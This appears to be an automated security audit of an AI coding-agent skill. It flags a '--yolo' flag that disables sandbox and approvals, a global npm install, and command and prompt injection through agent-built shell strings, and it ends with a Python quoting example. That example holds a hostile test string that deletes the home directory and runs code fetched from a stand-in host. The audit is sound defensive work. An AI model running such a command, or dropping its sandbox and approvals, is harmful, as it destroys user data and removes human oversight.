Trust Assessment
The `coding-agent` skill received a trust score of 65/100, placing it in the Caution category. This skill has security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 1 critical, 2 high, 1 medium, and 0 low severity. Key findings include a direct instruction to install an untrusted global package, an instruction to run the agent with sandboxing and approvals disabled (`--yolo`), and unsanitized command execution via the `bash` tool's `command` parameter.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 18, 2026 (commit b62bd290). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Instruction to use agent with disabled sandbox and approvals (`--yolo`).** The skill explicitly instructs the use of the `codex` agent with the `--yolo` flag, which is documented as "NO sandbox, NO approvals (fastest, most dangerous)". This grants the agent excessive permissions and removes critical security safeguards, making it highly vulnerable to command injection and arbitrary code execution if a malicious prompt is provided or generated. The flag should be avoided in any scenario involving untrusted input or sensitive environments. *Recommendation:* Strongly advise against using `--yolo` in production or with untrusted inputs. If its use is absolutely necessary, provide explicit, prominent warnings and ensure the `workdir` is strictly isolated and temporary. Consider removing the flag from examples, or making its use conditional on explicit user confirmation and a robust risk assessment. | LLM | SKILL.md:106 |
| HIGH | **Direct instruction to install untrusted global package.** The skill explicitly instructs the installation of a global npm package, `@mariozechner/pi-coding-agent`. Installing packages globally from potentially untrusted sources introduces a significant supply-chain risk, as a compromised package could lead to arbitrary code execution on the host system. This instruction bypasses typical sandboxing and isolated-environment practices. *Recommendation:* Avoid direct global-installation instructions within skills. If external tools are required, recommend secure, sandboxed, or isolated installation methods, or rely on pre-installed binaries. Provide clear warnings about the risks of installing untrusted software. | LLM | SKILL.md:159 |
| HIGH | **Unsanitized command execution via `bash` tool's `command` parameter.** The skill frequently instructs the LLM to use the `bash` tool with a `command` parameter that directly executes a shell string. If any part of this string is constructed from untrusted input (e.g., the agent's prompt or other dynamic content) without proper sanitization or escaping, it creates a direct command-injection vulnerability: an attacker could craft a malicious prompt to execute arbitrary shell commands on the host system. *Recommendation:* When constructing `command` strings from untrusted sources, ensure all dynamic parts are properly escaped for shell execution, and implement robust input validation. Prefer safer execution mechanisms that do not interpret shell metacharacters where available, or explicitly instruct the LLM to sanitize inputs. | LLM | SKILL.md:24 |
| MEDIUM | **Potential prompt injection/data exfiltration via `openclaw system event`.** The skill instructs the LLM to construct an `openclaw system event` command whose `text` argument summarizes the agent's work. If this summary is derived from untrusted agent output, a malicious agent could inject commands or exfiltrate sensitive data by crafting the `text` argument to include shell metacharacters or sensitive information, leading to unintended system actions or information disclosure. *Recommendation:* Strictly sanitize any dynamically generated `text` content, and instruct the LLM to filter or escape potentially malicious characters from agent output before including it in the `text` parameter. | LLM | SKILL.md:210 |
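The two injection findings share one mitigation: never splice untrusted text into a shell string verbatim. A minimal Python sketch, using the standard-library `shlex` module; the `openclaw system event` invocation shape is assumed from the finding text above, not a verified CLI signature:

```python
import shlex
import subprocess

def safe_event_command(summary: str) -> str:
    """Build a shell string with the untrusted summary quoted."""
    # shlex.quote wraps the text in single quotes, so metacharacters
    # (;, |, $(...), backticks) pass through as literal data.
    return "openclaw system event " + shlex.quote(summary)

malicious = "done; rm -rf ~ $(curl evil.sh)"
print(safe_event_command(malicious))
# → openclaw system event 'done; rm -rf ~ $(curl evil.sh)'

# Safer still: skip the shell entirely and pass an argument list,
# so there is no command string for an attacker to break out of.
subprocess.run(["echo", malicious], check=True)
```

The argument-list form is the kind of "safer execution mechanism" the `bash`-tool finding recommends: the payload reaches the child process as a single opaque argument rather than shell syntax.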